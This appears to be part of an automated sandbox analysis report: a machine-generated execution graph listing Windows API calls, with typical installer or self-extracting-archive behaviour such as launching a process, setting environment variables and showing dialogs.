                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Disassembly

                                                                                            Reset < >

                                                                                              Execution Graph

                                                                                              Execution Coverage:9.7%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:9.3%
                                                                                              Total number of Nodes:1501
                                                                                              Total number of Limit Nodes:26
                                                                                              execution_graph 24832 11b710 GetProcessHeap 24834 10be49 108 API calls 4 library calls 24835 f1f05 126 API calls __EH_prolog 24780 10ea00 46 API calls 6 library calls 22940 10db01 22941 10daaa 22940->22941 22942 10df59 ___delayLoadHelper2@8 19 API calls 22941->22942 22942->22941 24781 10ec0b 28 API calls 2 library calls 24837 10db0b 19 API calls ___delayLoadHelper2@8 22947 10c40e 22948 10c4c7 22947->22948 22955 10c42c _wcschr 22947->22955 22949 10c4e5 22948->22949 22963 10be49 _wcsrchr 22948->22963 23002 10ce22 22948->23002 22952 10ce22 18 API calls 22949->22952 22949->22963 22952->22963 22953 10ca8d 22954 1017ac CompareStringW 22954->22955 22955->22948 22955->22954 22957 10c11d SetWindowTextW 22957->22963 22962 10bf0b SetFileAttributesW 22965 10bfc5 GetFileAttributesW 22962->22965 22975 10bf25 ___scrt_get_show_window_mode 22962->22975 22963->22953 22963->22957 22963->22962 22968 10c2e7 GetDlgItem SetWindowTextW SendMessageW 22963->22968 22971 10c327 SendMessageW 22963->22971 22976 1017ac CompareStringW 22963->22976 22977 10aa36 22963->22977 22981 109da4 GetCurrentDirectoryW 22963->22981 22986 fa52a 7 API calls 22963->22986 22987 fa4b3 FindClose 22963->22987 22988 10ab9a 76 API calls ___std_exception_copy 22963->22988 22989 1135de 22963->22989 22965->22963 22966 10bfd7 DeleteFileW 22965->22966 22966->22963 22969 10bfe8 22966->22969 22968->22963 22983 f400a 22969->22983 22971->22963 22973 10c01d MoveFileW 22973->22963 22974 10c035 MoveFileExW 22973->22974 22974->22963 22975->22963 22975->22965 22982 fb4f7 52 API calls 2 library calls 22975->22982 22976->22963 22978 10aa40 22977->22978 22979 10aaf3 ExpandEnvironmentStringsW 22978->22979 22980 10ab16 22978->22980 22979->22980 22980->22963 22981->22963 22982->22975 23025 f3fdd 22983->23025 22986->22963 22987->22963 22988->22963 22990 118606 22989->22990 22991 118613 22990->22991 22992 11861e 22990->22992 23104 118518 22991->23104 22994 118626 22992->22994 23000 11862f __dosmaperr 22992->23000 22995 1184de _free 20 API calls 22994->22995 22998 11861b 22995->22998 22996 118634 23111 11895a 20 API calls __dosmaperr 22996->23111 22997 118659 HeapReAlloc 22997->22998 22997->23000 22998->22963 23000->22996 23000->22997 23112 1171ad 7 API calls 2 library calls 23000->23112 23003 10ce2c ___scrt_get_show_window_mode 23002->23003 23004 10cf1b 23003->23004 23010 10d08a 23003->23010 23118 1017ac CompareStringW 23003->23118 23115 fa180 23004->23115 23008 10cf4f ShellExecuteExW 23008->23010 23016 10cf62 23008->23016 23010->22949 23011 10cf47 23011->23008 23012 10cf9b 23120 10d2e6 6 API calls 23012->23120 23013 10cff1 CloseHandle 23014 10d00a 23013->23014 23015 10cfff 23013->23015 23014->23010 23021 10d081 ShowWindow 23014->23021 23121 1017ac CompareStringW 23015->23121 23016->23012 23016->23013 23018 10cf91 ShowWindow 23016->23018 23018->23012 23020 10cfb3 23020->23013 23022 10cfc6 GetExitCodeProcess 23020->23022 23021->23010 23022->23013 23023 10cfd9 23022->23023 23023->23013 23026 f3ff4 __vsnwprintf_l 23025->23026 23029 115759 23026->23029 23032 113837 23029->23032 23033 113877 23032->23033 23034 11385f 23032->23034 23033->23034 23036 11387f 23033->23036 23049 11895a 20 API calls __dosmaperr 23034->23049 23051 113dd6 23036->23051 23037 113864 23050 118839 26 API calls ___std_exception_copy 23037->23050 23042 10ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23044 f3ffe GetFileAttributesW 23042->23044 23043 113907 23060 114186 51 API calls 4 library calls 23043->23060 23044->22969 23044->22973 23047 11386f 23047->23042 23048 113912 23061 113e59 20 API calls _free 23048->23061 23049->23037 23050->23047 23052 113df3 23051->23052 23053 11388f 23051->23053 23052->23053 23062 118fa5 GetLastError 23052->23062 23059 113da1 20 API calls 2 library calls 23053->23059 23055 113e14 23082 1190fa 38 API calls __fassign 23055->23082 23057 113e2d 23083 119127 38 API calls __fassign 23057->23083 23059->23043 23060->23048 23061->23047 23063 118fc1 23062->23063 23064 118fbb 23062->23064 23068 119010 SetLastError 23063->23068 23085 1185a9 23063->23085 23084 11a61b 11 API calls 2 library calls 23064->23084 23068->23055 23069 118fdb 23092 1184de 23069->23092 23072 118ff0 23072->23069 23074 118ff7 23072->23074 23073 118fe1 23076 11901c SetLastError 23073->23076 23099 118e16 20 API calls __dosmaperr 23074->23099 23100 118566 38 API calls _abort 23076->23100 23077 119002 23079 1184de _free 20 API calls 23077->23079 23081 119009 23079->23081 23081->23068 23081->23076 23082->23057 23083->23053 23084->23063 23086 1185b6 __dosmaperr 23085->23086 23087 1185f6 23086->23087 23088 1185e1 RtlAllocateHeap 23086->23088 23101 1171ad 7 API calls 2 library calls 23086->23101 23102 11895a 20 API calls __dosmaperr 23087->23102 23088->23086 23090 1185f4 23088->23090 23090->23069 23098 11a671 11 API calls 2 library calls 23090->23098 23093 118512 __dosmaperr 23092->23093 23094 1184e9 RtlFreeHeap 23092->23094 23093->23073 23094->23093 23095 1184fe 23094->23095 23103 11895a 20 API calls __dosmaperr 23095->23103 23097 118504 GetLastError 23097->23093 23098->23072 23099->23077 23101->23086 23102->23090 23103->23097 23105 118556 23104->23105 23109 118526 __dosmaperr 23104->23109 23114 11895a 20 API calls __dosmaperr 23105->23114 23106 118541 RtlAllocateHeap 23108 118554 23106->23108 23106->23109 23108->22998 23109->23105 23109->23106 23113 1171ad 7 API calls 2 library calls 23109->23113 23111->22998 23112->23000 23113->23109 23114->23108 23122 fa194 23115->23122 23118->23004 23119 fb239 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW CharUpperW 23119->23011 23120->23020 23121->23014 23130 10e360 23122->23130 23125 fa189 23125->23008 23125->23119 23126 fa1b2 23132 fb66c 23126->23132 23128 fa1c6 23128->23125 23129 fa1ca GetFileAttributesW 23128->23129 23129->23125 23131 fa1a1 GetFileAttributesW 23130->23131 23131->23125 23131->23126 23133 fb679 23132->23133 23141 fb683 23133->23141 23142 fb806 CharUpperW 23133->23142 23135 fb692 23143 fb832 CharUpperW 23135->23143 23137 fb6a1 23138 fb71c GetCurrentDirectoryW 23137->23138 23139 fb6a5 23137->23139 23138->23141 23144 fb806 CharUpperW 23139->23144 23141->23128 23142->23135 23143->23137 23144->23141 24838 f6110 80 API calls 23145 f9f2f 23146 f9f44 23145->23146 23149 f9f3d 23145->23149 23147 f9f4a GetStdHandle 23146->23147 23155 f9f55 23146->23155 23147->23155 23148 f9fa9 WriteFile 23148->23155 23150 f9f7c WriteFile 23151 f9f7a 23150->23151 23150->23155 23151->23150 23151->23155 23153 fa031 23157 f7061 75 API calls 23153->23157 23155->23148 23155->23149 23155->23150 23155->23151 23155->23153 23156 f6e18 60 API calls 23155->23156 23156->23155 23157->23149 23158 11b731 31 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 24782 10a430 73 API calls 24840 10be49 103 API calls 4 library calls 24783 f1025 29 API calls pre_c_initialization 24845 109b50 GdipDisposeImage GdipFree ___InternalCxxFrameHandler 24785 118050 8 API calls ___vcrt_uninitialize 23913 10dc5d 23914 10dc2e 23913->23914 23914->23913 23915 10df59 ___delayLoadHelper2@8 19 API calls 23914->23915 23915->23914 24787 10ec40 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 24788 108c40 GetClientRect 24789 113040 5 API calls 2 library calls 24847 10be49 98 API calls 3 library calls 24790 120040 IsProcessorFeaturePresent 23923 f9b59 23924 f9bd7 23923->23924 23927 f9b63 23923->23927 23925 f9bad SetFilePointer 23925->23924 23926 f9bcd GetLastError 23925->23926 23926->23924 23927->23925 24848 10d34e DialogBoxParamW 23963 10d573 23964 10d580 23963->23964 23965 fddd1 53 API calls 23964->23965 23966 10d594 23965->23966 23967 f400a _swprintf 51 API calls 23966->23967 23968 10d5a6 SetDlgItemTextW 23967->23968 23971 10ac74 PeekMessageW 23968->23971 23972 10acc8 23971->23972 23973 10ac8f GetMessageW 23971->23973 23974 10acb4 TranslateMessage DispatchMessageW 23973->23974 23975 10aca5 IsDialogMessageW 23973->23975 23974->23972 23975->23972 23975->23974 24793 105c77 121 API calls __vsnwprintf_l 24795 10fc60 51 API calls 2 library calls 24797 113460 RtlUnwind 24798 119c60 71 API calls _free 24800 f1075 82 API calls pre_c_initialization 24802 107090 114 API calls 24803 10cc90 70 API calls 24850 10a990 97 API calls 24851 109b90 GdipCloneImage GdipAlloc 22855 10d891 19 API calls ___delayLoadHelper2@8 24852 119b90 21 API calls 2 library calls 24853 112397 48 API calls 22857 10d997 22858 10d89b 22857->22858 22860 10df59 22858->22860 22888 10dc67 22860->22888 22862 10df73 22863 10dfd0 22862->22863 22876 10dff4 22862->22876 22864 10ded7 DloadReleaseSectionWriteAccess 11 API calls 22863->22864 22865 10dfdb RaiseException 22864->22865 22867 10e1c9 22865->22867 22866 10e0df 22875 10e13d GetProcAddress 22866->22875 22881 10e19b 22866->22881 22907 10ec4a 22867->22907 22868 10e06c LoadLibraryExA 22870 10e0cd 22868->22870 22871 10e07f GetLastError 22868->22871 22870->22866 22873 10e0d8 FreeLibrary 22870->22873 22874 10e0a8 22871->22874 22884 10e092 22871->22884 22872 10e1d8 22872->22858 22873->22866 22878 10ded7 DloadReleaseSectionWriteAccess 11 API calls 22874->22878 22877 10e14d GetLastError 22875->22877 22875->22881 22876->22866 22876->22868 22876->22870 22876->22881 22886 10e160 22877->22886 22880 10e0b3 RaiseException 22878->22880 22880->22867 22899 10ded7 22881->22899 22882 10ded7 DloadReleaseSectionWriteAccess 11 API calls 22883 10e181 RaiseException 22882->22883 22885 10dc67 ___delayLoadHelper2@8 11 API calls 22883->22885 22884->22870 22884->22874 22887 10e198 22885->22887 22886->22881 22886->22882 22887->22881 22889 10dc73 22888->22889 22890 10dc99 22888->22890 22914 10dd15 22889->22914 22890->22862 22894 10dc94 22924 10dc9a 22894->22924 22896 10ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 22897 10df55 22896->22897 22897->22862 22898 10df24 22898->22896 22900 10dee9 22899->22900 22901 10df0b 22899->22901 22902 10dd15 DloadLock 8 API calls 22900->22902 22901->22867 22903 10deee 22902->22903 22904 10df06 22903->22904 22905 10de67 DloadProtectSection 3 API calls 22903->22905 22933 10df0f 8 API calls 2 library calls 22904->22933 22905->22904 22908 10ec53 22907->22908 22909 10ec55 IsProcessorFeaturePresent 22907->22909 22908->22872 22911 10f267 22909->22911 22934 10f22b SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 22911->22934 22913 10f34a 22913->22872 22915 10dc9a DloadLock 3 API calls 22914->22915 22916 10dd2a 22915->22916 22917 10ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 22916->22917 22918 10dc78 22917->22918 22918->22894 22919 10de67 22918->22919 22920 10de7c DloadObtainSection 22919->22920 22921 10de82 22920->22921 22922 10deb7 VirtualProtect 22920->22922 22932 10dd72 VirtualQuery GetSystemInfo 22920->22932 22921->22894 22922->22921 22925 10dca7 22924->22925 22926 10dcab 22924->22926 22925->22898 22927 10dcb3 GetModuleHandleW 22926->22927 22928 10dcaf 22926->22928 22929 10dcc9 GetProcAddress 22927->22929 22931 10dcc5 22927->22931 22928->22898 22930 10dcd9 GetProcAddress 22929->22930 22929->22931 22930->22931 22931->22898 22932->22922 22933->22901 22934->22913 22935 f1385 82 API calls 3 library calls 24805 10a89d 78 API calls 24855 115780 QueryPerformanceFrequency QueryPerformanceCounter 24807 fea98 FreeLibrary 24808 11ac0e 27 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 23159 1190b0 23167 11a56f 23159->23167 23163 1190cc 23164 1190d9 23163->23164 23175 1190e0 11 API calls 23163->23175 23166 1190c4 23176 11a458 23167->23176 23170 11a5ae TlsAlloc 23171 11a59f 23170->23171 23172 10ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23171->23172 23173 1190ba 23172->23173 23173->23166 23174 119029 20 API calls 2 library calls 23173->23174 23174->23163 23175->23166 23177 11a488 23176->23177 23180 11a484 23176->23180 23177->23170 23177->23171 23178 11a4a8 23178->23177 23181 11a4b4 GetProcAddress 23178->23181 23180->23177 23180->23178 23183 11a4f4 23180->23183 23182 11a4c4 __crt_fast_encode_pointer 23181->23182 23182->23177 23184 11a515 LoadLibraryExW 23183->23184 23185 11a50a 23183->23185 23186 11a532 GetLastError 23184->23186 23187 11a54a 23184->23187 23185->23180 23186->23187 23188 11a53d LoadLibraryExW 23186->23188 23187->23185 23189 11a561 FreeLibrary 23187->23189 23188->23187 23189->23185 23190 11a3b0 23191 11a3bb 23190->23191 23193 11a3e4 23191->23193 23195 11a3e0 23191->23195 23196 11a6ca 23191->23196 23203 11a410 DeleteCriticalSection 23193->23203 23197 11a458 __dosmaperr 5 API calls 23196->23197 23198 11a6f1 23197->23198 23199 11a6fa 23198->23199 23200 11a70f InitializeCriticalSectionAndSpinCount 23198->23200 23201 10ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23199->23201 23200->23199 23202 11a726 23201->23202 23202->23191 23203->23195 24810 111eb0 6 API calls 4 library calls 24857 1179b7 55 API calls _free 24811 1176bd 52 API calls 3 library calls 24812 f96a0 79 API calls 24861 11e9a0 51 API calls 24815 10e4a2 38 API calls 2 library calls 24818 f16b0 84 API calls 24819 10acd0 100 API calls 24862 1019d0 26 API calls std::bad_exception::bad_exception 23212 10ead2 23213 10eade ___scrt_is_nonwritable_in_current_image 23212->23213 23238 10e5c7 23213->23238 23215 10eae5 23217 10eb0e 23215->23217 23318 10ef05 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 23215->23318 23225 10eb4d ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 23217->23225 23249 11824d 23217->23249 23221 10eb2d ___scrt_is_nonwritable_in_current_image 23222 10ebad 23257 10f020 23222->23257 23225->23222 23319 117243 38 API calls 2 library calls 23225->23319 23233 10ebd9 23235 10ebe2 23233->23235 23320 11764a 28 API calls _abort 23233->23320 23321 10e73e 13 API calls 2 library calls 23235->23321 23239 10e5d0 23238->23239 23322 10ed5b IsProcessorFeaturePresent 23239->23322 23241 10e5dc 23323 112016 23241->23323 23243 10e5e1 23244 10e5e5 23243->23244 23332 1180d7 23243->23332 23244->23215 23247 10e5fc 23247->23215 23252 118264 23249->23252 23250 10ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23251 10eb27 23250->23251 23251->23221 23253 1181f1 23251->23253 23252->23250 23254 118220 23253->23254 23255 10ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23254->23255 23256 118249 23255->23256 23256->23225 23424 10f350 23257->23424 23260 10ebb3 23261 11819e 23260->23261 23426 11b290 23261->23426 23263 1181a7 23265 10ebbc 23263->23265 23430 11b59a 38 API calls 23263->23430 23266 10d5d4 23265->23266 23551 1000cf 23266->23551 23270 10d5f3 23600 10a335 23270->23600 23272 10d5fc 23604 1013b3 GetCPInfo 23272->23604 23274 10d606 ___scrt_get_show_window_mode 23275 10d619 GetCommandLineW 23274->23275 23276 10d6a6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 23275->23276 23277 10d628 23275->23277 23278 f400a _swprintf 51 API calls 23276->23278 23607 10bc84 23277->23607 23280 10d70d SetEnvironmentVariableW GetModuleHandleW LoadIconW 23278->23280 23618 10aded LoadBitmapW 23280->23618 23283 10d6a0 23612 10d287 23283->23612 23284 10d636 OpenFileMappingW 23287 10d696 CloseHandle 23284->23287 23288 10d64f MapViewOfFile 23284->23288 23287->23276 23290 10d660 __vsnwprintf_l 23288->23290 23291 10d68d UnmapViewOfFile 23288->23291 23295 10d287 2 API calls 23290->23295 23291->23287 23297 10d67c 23295->23297 23296 108835 8 API calls 23298 10d76a DialogBoxParamW 23296->23298 23297->23291 23299 10d7a4 23298->23299 23300 10d7b6 Sleep 23299->23300 23301 10d7bd 23299->23301 23300->23301 23304 10d7cb 23301->23304 23648 10a544 CompareStringW SetCurrentDirectoryW ___scrt_get_show_window_mode 23301->23648 23303 10d7ea DeleteObject 23305 10d806 23303->23305 23306 10d7ff DeleteObject 23303->23306 23304->23303 23307 10d837 23305->23307 23310 10d849 23305->23310 23306->23305 23649 10d2e6 6 API calls 23307->23649 23309 10d83d CloseHandle 23309->23310 23645 10a39d 23310->23645 23312 10d883 23313 11757e GetModuleHandleW 23312->23313 23314 10ebcf 23313->23314 23314->23233 23315 1176a7 23314->23315 23858 117424 23315->23858 23318->23215 23319->23222 23320->23235 23321->23221 23322->23241 23324 11201b ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 23323->23324 23336 11310e 23324->23336 23328 112031 23329 11203c 23328->23329 23350 11314a DeleteCriticalSection 23328->23350 23329->23243 23331 112029 23331->23243 23378 11b73a 23332->23378 23335 11203f 8 API calls 3 library calls 23335->23244 23339 113117 23336->23339 23338 113140 23356 11314a DeleteCriticalSection 23338->23356 23339->23338 23340 112025 23339->23340 23351 113385 23339->23351 23340->23331 23342 11215c 23340->23342 23371 11329a 23342->23371 23344 112166 23345 112171 23344->23345 23376 113348 6 API calls try_get_function 23344->23376 23345->23328 23347 11217f 23348 11218c 23347->23348 23377 11218f 6 API calls ___vcrt_FlsFree 23347->23377 23348->23328 23350->23331 23357 113179 23351->23357 23354 1133bc InitializeCriticalSectionAndSpinCount 23355 1133a8 23354->23355 23355->23339 23356->23340 23360 1131a9 23357->23360 23361 1131ad 23357->23361 23358 1131cd 23358->23361 23362 1131d9 GetProcAddress 23358->23362 23360->23358 23360->23361 23364 113219 23360->23364 23361->23354 23361->23355 23363 1131e9 __crt_fast_encode_pointer 23362->23363 23363->23361 23365 113241 LoadLibraryExW 23364->23365 23366 113236 23364->23366 23367 11325d GetLastError 23365->23367 23370 113275 23365->23370 23366->23360 23368 113268 LoadLibraryExW 23367->23368 23367->23370 23368->23370 23369 11328c FreeLibrary 23369->23366 23370->23366 23370->23369 23372 113179 try_get_function 5 API calls 23371->23372 23373 1132b4 23372->23373 23374 1132cc TlsAlloc 23373->23374 23375 1132bd 23373->23375 23375->23344 23376->23347 23377->23345 23379 11b757 23378->23379 23382 11b753 23378->23382 23379->23382 23384 119e60 23379->23384 23380 10ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23381 10e5ee 23380->23381 23381->23247 23381->23335 23382->23380 23385 119e6c ___scrt_is_nonwritable_in_current_image 23384->23385 23396 11a3f1 EnterCriticalSection 23385->23396 23387 119e73 23397 11bc39 23387->23397 23389 119e82 23395 119e91 23389->23395 23410 119ce9 29 API calls 23389->23410 23392 119ea2 ___scrt_is_nonwritable_in_current_image 23392->23379 23393 119e8c 23411 119d9f GetStdHandle GetFileType 23393->23411 23412 119ead LeaveCriticalSection _abort 23395->23412 23396->23387 23398 11bc45 ___scrt_is_nonwritable_in_current_image 23397->23398 23399 11bc52 23398->23399 23400 11bc69 23398->23400 23421 11895a 20 API calls __dosmaperr 23399->23421 23413 11a3f1 EnterCriticalSection 23400->23413 23403 11bc57 23422 118839 26 API calls ___std_exception_copy 23403->23422 23405 11bca1 23423 11bcc8 LeaveCriticalSection _abort 23405->23423 23406 11bc61 ___scrt_is_nonwritable_in_current_image 23406->23389 23409 11bc75 23409->23405 23414 11bb8a 23409->23414 23410->23393 23411->23395 23412->23392 23413->23409 23415 1185a9 __dosmaperr 20 API calls 23414->23415 23417 11bb9c 23415->23417 23416 11bba9 23418 1184de _free 20 API calls 23416->23418 23417->23416 23419 11a6ca 11 API calls 23417->23419 23420 11bbfb 23418->23420 23419->23417 23420->23409 23421->23403 23422->23406 23423->23406 23425 10f033 GetStartupInfoW 23424->23425 23425->23260 23427 11b299 23426->23427 23428 11b2a2 23426->23428 23431 11b188 23427->23431 23428->23263 23430->23263 23432 118fa5 pre_c_initialization 38 API calls 23431->23432 23433 11b195 23432->23433 23451 11b2ae 23433->23451 23435 11b19d 23460 11af1b 23435->23460 23438 11b1b4 23438->23428 23439 118518 __onexit 21 API calls 23440 11b1c5 23439->23440 23447 11b1f7 23440->23447 23467 11b350 23440->23467 23443 1184de _free 20 API calls 23443->23438 23444 11b1f2 23477 11895a 20 API calls __dosmaperr 23444->23477 23446 11b23b 23446->23447 23478 11adf1 26 API calls 23446->23478 23447->23443 23448 11b20f 23448->23446 23449 1184de _free 20 API calls 23448->23449 23449->23446 23452 11b2ba ___scrt_is_nonwritable_in_current_image 23451->23452 23453 118fa5 pre_c_initialization 38 API calls 23452->23453 23455 11b2c4 23453->23455 23456 11b348 ___scrt_is_nonwritable_in_current_image 23455->23456 23459 1184de _free 20 API calls 23455->23459 23479 118566 38 API calls _abort 23455->23479 23480 11a3f1 EnterCriticalSection 23455->23480 23481 11b33f LeaveCriticalSection _abort 23455->23481 23456->23435 23459->23455 23461 113dd6 __fassign 38 API calls 23460->23461 23462 11af2d 23461->23462 23463 11af3c GetOEMCP 23462->23463 23464 11af4e 23462->23464 23465 11af65 23463->23465 23464->23465 23466 11af53 GetACP 23464->23466 23465->23438 23465->23439 23466->23465 23468 11af1b 40 API calls 23467->23468 23469 11b36f 23468->23469 23472 11b3c0 IsValidCodePage 23469->23472 23474 11b376 23469->23474 23476 11b3e5 ___scrt_get_show_window_mode 23469->23476 23470 10ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23471 11b1ea 23470->23471 23471->23444 23471->23448 23473 11b3d2 GetCPInfo 23472->23473 23472->23474 23473->23474 23473->23476 23474->23470 23482 11aff4 GetCPInfo 23476->23482 23477->23447 23478->23447 23480->23455 23481->23455 23486 11b02e 23482->23486 23491 11b0d8 23482->23491 23485 10ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23488 11b184 23485->23488 23492 11c099 23486->23492 23488->23474 23490 11a275 __vsnwprintf_l 43 API calls 23490->23491 23491->23485 23493 113dd6 __fassign 38 API calls 23492->23493 23494 11c0b9 MultiByteToWideChar 23493->23494 23496 11c0f7 23494->23496 23503 11c18f 23494->23503 23498 118518 __onexit 21 API calls 23496->23498 23502 11c118 __vsnwprintf_l ___scrt_get_show_window_mode 23496->23502 23497 10ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23499 11b08f 23497->23499 23498->23502 23506 11a275 23499->23506 23500 11c189 23511 11a2c0 20 API calls _free 23500->23511 23502->23500 23504 11c15d MultiByteToWideChar 23502->23504 23503->23497 23504->23500 23505 11c179 GetStringTypeW 23504->23505 23505->23500 23507 113dd6 __fassign 38 API calls 23506->23507 23508 11a288 23507->23508 23512 11a058 23508->23512 23511->23503 23514 11a073 __vsnwprintf_l 23512->23514 23513 11a099 MultiByteToWideChar 23515 11a24d 23513->23515 23516 11a0c3 23513->23516 23514->23513 23517 10ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23515->23517 23519 118518 __onexit 21 API calls 23516->23519 23521 11a0e4 __vsnwprintf_l 23516->23521 23518 11a260 23517->23518 23518->23490 23519->23521 23520 11a12d MultiByteToWideChar 23522 11a146 23520->23522 23534 11a199 23520->23534 23521->23520 23521->23534 23539 11a72c 23522->23539 23526 11a170 23530 11a72c __vsnwprintf_l 11 API calls 23526->23530 23526->23534 23527 11a1a8 23528 118518 __onexit 21 API calls 23527->23528 23535 11a1c9 __vsnwprintf_l 23527->23535 23528->23535 23529 11a23e 23547 11a2c0 20 API calls _free 23529->23547 23530->23534 23531 11a72c __vsnwprintf_l 11 API calls 23533 11a21d 23531->23533 23533->23529 23536 11a22c WideCharToMultiByte 23533->23536 23548 11a2c0 20 API calls _free 23534->23548 23535->23529 23535->23531 23536->23529 23537 11a26c 23536->23537 23549 11a2c0 20 API calls _free 23537->23549 23540 11a458 __dosmaperr 5 API calls 23539->23540 23541 11a753 23540->23541 23544 11a75c 23541->23544 23550 11a7b4 10 API calls 3 library calls 23541->23550 23543 11a79c LCMapStringW 23543->23544 23545 10ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23544->23545 23546 11a15d 23545->23546 23546->23526 23546->23527 23546->23534 23547->23534 23548->23515 23549->23534 23550->23543 23552 10e360 23551->23552 23553 1000d9 GetModuleHandleW 23552->23553 23554 1000f0 GetProcAddress 23553->23554 23555 100154 23553->23555 23557 100121 GetProcAddress 23554->23557 23558 100109 23554->23558 23556 100484 GetModuleFileNameW 23555->23556 23659 1170dd 42 API calls 2 library calls 23555->23659 23569 1004a3 23556->23569 23557->23555 23559 100133 23557->23559 23558->23557 23559->23555 23561 1003be 23561->23556 23562 1003c9 GetModuleFileNameW CreateFileW 23561->23562 23563 100478 CloseHandle 23562->23563 23564 1003fc SetFilePointer 23562->23564 23563->23556 23564->23563 23565 10040c ReadFile 23564->23565 23565->23563 23567 10042b 23565->23567 23567->23563 23571 100085 2 API calls 23567->23571 23570 1004d2 CompareStringW 23569->23570 23572 100508 GetFileAttributesW 23569->23572 23573 100520 23569->23573 23650 facf5 23569->23650 23653 100085 23569->23653 23570->23569 23571->23567 23572->23569 23572->23573 23574 10052a 23573->23574 23576 100560 23573->23576 23577 100542 GetFileAttributesW 23574->23577 23579 10055a 23574->23579 23575 10066f 23599 109da4 GetCurrentDirectoryW 23575->23599 23576->23575 23578 facf5 GetVersionExW 23576->23578 23577->23574 23577->23579 23580 10057a 23578->23580 23579->23576 23581 100581 23580->23581 23582 1005e7 23580->23582 23584 100085 2 API calls 23581->23584 23583 f400a _swprintf 51 API calls 23582->23583 23585 10060f AllocConsole 23583->23585 23586 10058b 23584->23586 23587 100667 ExitProcess 23585->23587 23588 10061c GetCurrentProcessId AttachConsole 23585->23588 23589 100085 2 API calls 23586->23589 23663 1135b3 23588->23663 23591 100595 23589->23591 23660 fddd1 23591->23660 23592 10063d GetStdHandle WriteConsoleW Sleep FreeConsole 23592->23587 23595 f400a _swprintf 51 API calls 23596 1005c3 23595->23596 23597 fddd1 53 API calls 23596->23597 23598 1005d2 23597->23598 23598->23587 23599->23270 23601 100085 2 API calls 23600->23601 23602 10a349 OleInitialize 23601->23602 23603 10a36c GdiplusStartup SHGetMalloc 23602->23603 23603->23272 23605 1013d7 IsDBCSLeadByte 23604->23605 23605->23605 23606 1013ef 23605->23606 23606->23274 23608 10bc8e 23607->23608 23609 10bda4 23608->23609 23610 10179d CharUpperW 23608->23610 23688 fecad 80 API calls ___scrt_get_show_window_mode 23608->23688 23609->23283 23609->23284 23610->23608 23613 10e360 23612->23613 23614 10d294 SetEnvironmentVariableW 23613->23614 23616 10d2b7 23614->23616 23615 10d2df 23615->23276 23616->23615 23617 10d2d3 SetEnvironmentVariableW 23616->23617 23617->23615 23619 10ae15 23618->23619 23620 10ae0e 23618->23620 23622 10ae2a 23619->23622 23623 10ae1b GetObjectW 23619->23623 23694 109e1c FindResourceW 23620->23694 23689 109d1a 23622->23689 23623->23622 23626 10ae80 23637 fd31c 23626->23637 23627 10ae5c 23710 109d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23627->23710 23629 109e1c 13 API calls 23630 10ae4d 23629->23630 23630->23627 23632 10ae53 DeleteObject 23630->23632 23631 10ae64 23711 109d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23631->23711 23632->23627 23634 10ae6d 23712 109f5d 8 API calls ___scrt_get_show_window_mode 23634->23712 23636 10ae74 DeleteObject 23636->23626 23723 fd341 23637->23723 23639 fd328 23763 fda4e GetModuleHandleW FindResourceW 23639->23763 23642 108835 23849 10e24a 23642->23849 23646 10a3cc GdiplusShutdown CoUninitialize 23645->23646 23646->23312 23648->23304 23649->23309 23651 fad09 GetVersionExW 23650->23651 23652 fad45 23650->23652 23651->23652 23652->23569 23654 10e360 23653->23654 23655 100092 GetSystemDirectoryW 23654->23655 23656 1000c8 23655->23656 23657 1000aa 23655->23657 23656->23569 23658 1000bb LoadLibraryW 23657->23658 23658->23656 23659->23561 23665 fddff 23660->23665 23664 1135bb 23663->23664 23664->23592 23664->23664 23671 fd28a 23665->23671 23668 fddfc 23668->23595 23669 fde22 LoadStringW 23669->23668 23670 fde39 LoadStringW 23669->23670 23670->23668 23676 fd1c3 23671->23676 23673 fd2a7 23674 fd2bc 23673->23674 23684 fd2c8 26 API calls 23673->23684 23674->23668 23674->23669 23677 fd1de 23676->23677 23683 fd1d7 _strncpy 23676->23683 23678 fd202 23677->23678 23685 101596 WideCharToMultiByte 23677->23685 23680 fd233 23678->23680 23686 fdd6b 50 API calls __vsnprintf 23678->23686 23687 1158d9 26 API calls 3 library calls 23680->23687 23683->23673 23684->23674 23685->23678 23686->23680 23687->23683 23688->23608 23713 109d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23689->23713 23691 109d21 23692 109d2d 23691->23692 23714 109d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23691->23714 23692->23626 23692->23627 23692->23629 23695 109e3e SizeofResource 23694->23695 23696 109e70 23694->23696 23695->23696 23697 109e52 LoadResource 23695->23697 23696->23619 23697->23696 23698 